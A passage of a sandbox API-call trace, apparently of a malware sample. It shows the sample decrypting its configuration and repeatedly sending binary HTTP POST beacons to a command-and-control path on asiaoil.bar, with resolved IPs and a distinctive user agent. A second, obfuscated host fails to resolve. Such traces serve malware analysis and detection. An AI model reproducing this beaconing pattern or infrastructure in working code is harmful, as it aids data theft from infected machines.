(HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0307.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.575] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.582] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0307.589] GetProcessHeap () returned 0x740000 [0307.589] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0307.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.590] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0307.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.592] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.593] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.593] GetProcessHeap () returned 0x740000 [0307.594] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0307.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.595] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0307.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.596] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0307.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.597] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0307.597] GetProcessHeap () returned 0x740000 [0307.597] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0307.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.599] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0307.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.600] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0307.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.662] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0307.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.663] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0307.663] GetProcessHeap () returned 0x740000 [0307.663] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0307.663] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0307.665] GetProcessHeap () returned 0x740000 [0307.665] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0307.666] socket (af=2, type=1, protocol=6) returned 0x2d4 [0307.666] connect (s=0x2d4, name=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0307.694] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0307.694] GetProcessHeap () returned 0x740000 [0307.694] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cdd0 [0307.694] GetProcessHeap () returned 0x740000 [0307.694] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0307.695] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0307.696] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0307.696] GetProcessHeap () returned 0x740000 [0307.696] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0307.696] GetProcessHeap () returned 0x740000 [0307.697] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0307.697] GetProcessHeap () returned 0x740000 [0307.697] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763e00 [0307.697] GetProcessHeap () returned 0x740000 [0307.697] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0307.697] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0307.698] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0307.698] GetProcessHeap () returned 0x740000 [0307.698] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0307.698] GetProcessHeap () returned 0x740000 [0307.699] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0307.699] send (s=0x2d4, buf=0x747928*, len=243, flags=0) returned 243 [0307.699] send (s=0x2d4, buf=0x761fd0*, len=159, flags=0) returned 159 [0307.699] GetProcessHeap () returned 0x740000 [0307.699] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0307.699] recv (in: s=0x2d4, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0307.797] GetProcessHeap () returned 0x740000 [0307.797] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0307.797] GetProcessHeap () returned 0x740000 [0307.798] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763e00 | out: hHeap=0x740000) returned 1 [0307.798] GetProcessHeap () returned 0x740000 [0307.798] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0307.799] GetProcessHeap () returned 0x740000 [0307.799] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cdd0 | out: hHeap=0x740000) returned 1 [0307.799] closesocket (s=0x2d4) returned 0 [0307.800] GetProcessHeap () returned 0x740000 [0307.800] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0307.800] GetProcessHeap () returned 0x740000 [0307.800] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0307.800] GetProcessHeap () returned 0x740000 [0307.801] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0307.801] GetProcessHeap () returned 0x740000 [0307.802] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0307.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10b8) returned 0x2d4 [0307.803] Sleep (dwMilliseconds=0xea60) [0307.805] GetProcessHeap () returned 0x740000 [0307.805] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0307.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.806] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.811] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75ce58) returned 1 [0307.823] GetProcessHeap () returned 0x740000 [0307.823] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0307.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.824] CryptImportKey (in: hProv=0x75ce58, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0307.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.825] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.826] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.826] GetProcessHeap () returned 0x740000 [0307.827] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0307.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.828] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0307.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.829] CryptDestroyKey (hKey=0x74d768) returned 1 [0307.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.830] CryptReleaseContext (hProv=0x75ce58, dwFlags=0x0) returned 1 [0307.830] GetProcessHeap () returned 0x740000 [0307.830] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0307.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.831] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.832] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.833] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.833] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.833] GetProcessHeap () returned 0x740000 [0307.833] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0307.834] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0307.834] GetProcessHeap () returned 0x740000 [0307.834] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0307.835] GetProcessHeap () returned 0x740000 [0307.835] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0307.841] GetProcessHeap () returned 0x740000 [0307.842] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0307.842] GetProcessHeap () returned 0x740000 [0307.842] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763db8 [0307.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.843] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.848] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cdd0) returned 1 [0307.855] GetProcessHeap () returned 0x740000 [0307.855] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0307.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.856] CryptImportKey (in: hProv=0x75cdd0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0307.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.857] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.857] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.857] GetProcessHeap () returned 0x740000 [0307.858] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0307.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.859] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763db8, pdwDataLen=0x19fcfc | out: pbData=0x763db8, pdwDataLen=0x19fcfc) returned 1 [0307.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.860] CryptDestroyKey (hKey=0x74d768) returned 1 [0307.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.860] CryptReleaseContext (hProv=0x75cdd0, dwFlags=0x0) returned 1 [0307.860] GetProcessHeap () returned 0x740000 [0307.860] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0307.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.861] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0307.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.862] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0307.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.864] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0307.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.865] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0307.865] GetProcessHeap () returned 0x740000 [0307.865] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be68 [0307.865] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0307.866] GetProcessHeap () returned 0x740000 [0307.866] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6a0 [0307.866] socket (af=2, type=1, protocol=6) returned 0x2d8 [0307.867] connect (s=0x2d8, name=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0307.891] FreeAddrInfoW (pAddrInfo=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0307.891] GetProcessHeap () returned 0x740000 [0307.891] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0307.891] GetProcessHeap () returned 0x740000 [0307.891] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0307.892] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0307.893] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0307.893] GetProcessHeap () returned 0x740000 [0307.893] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0307.893] GetProcessHeap () returned 0x740000 [0307.894] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0307.894] GetProcessHeap () returned 0x740000 [0307.894] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0307.895] GetProcessHeap () returned 0x740000 [0307.895] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0307.895] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0307.896] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0307.896] GetProcessHeap () returned 0x740000 [0307.896] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0307.896] GetProcessHeap () returned 0x740000 [0307.896] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0307.896] send (s=0x2d8, buf=0x747928*, len=243, flags=0) returned 243 [0307.897] send (s=0x2d8, buf=0x761fd0*, len=159, flags=0) returned 159 [0307.897] GetProcessHeap () returned 0x740000 [0307.897] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0307.897] recv (in: s=0x2d8, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 577 [0308.071] GetProcessHeap () returned 0x740000 [0308.071] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0308.072] GetProcessHeap () returned 0x740000 [0308.072] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0308.072] GetProcessHeap () returned 0x740000 [0308.073] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0308.073] GetProcessHeap () returned 0x740000 [0308.073] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0308.073] closesocket (s=0x2d8) returned 0 [0308.074] GetProcessHeap () returned 0x740000 [0308.074] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6a0 | out: hHeap=0x740000) returned 1 [0308.074] GetProcessHeap () returned 0x740000 [0308.074] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0308.074] GetProcessHeap () returned 0x740000 [0308.075] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763db8 | out: hHeap=0x740000) returned 1 [0308.075] GetProcessHeap () returned 0x740000 [0308.075] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be68 | out: hHeap=0x740000) returned 1 [0308.083] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10fc) returned 0x2d8 [0308.085] Sleep (dwMilliseconds=0xea60) [0308.090] GetProcessHeap () returned 0x740000 [0308.090] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0308.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.091] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.103] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0308.112] GetProcessHeap () returned 0x740000 [0308.112] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0308.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.113] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0308.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.115] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0308.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.116] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.116] GetProcessHeap () returned 0x740000 [0308.116] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0308.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.117] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0308.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.118] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0308.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.187] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0308.187] GetProcessHeap () returned 0x740000 [0308.187] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766138 [0308.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.188] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0308.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.189] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0308.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.190] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0308.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.191] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0308.191] GetProcessHeap () returned 0x740000 [0308.191] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0308.191] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0308.191] GetProcessHeap () returned 0x740000 [0308.192] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0308.192] GetProcessHeap () returned 0x740000 [0308.192] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766138 | out: hHeap=0x740000) returned 1 [0308.192] GetProcessHeap () returned 0x740000 [0308.193] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0308.193] GetProcessHeap () returned 0x740000 [0308.193] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0308.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.193] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.199] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: 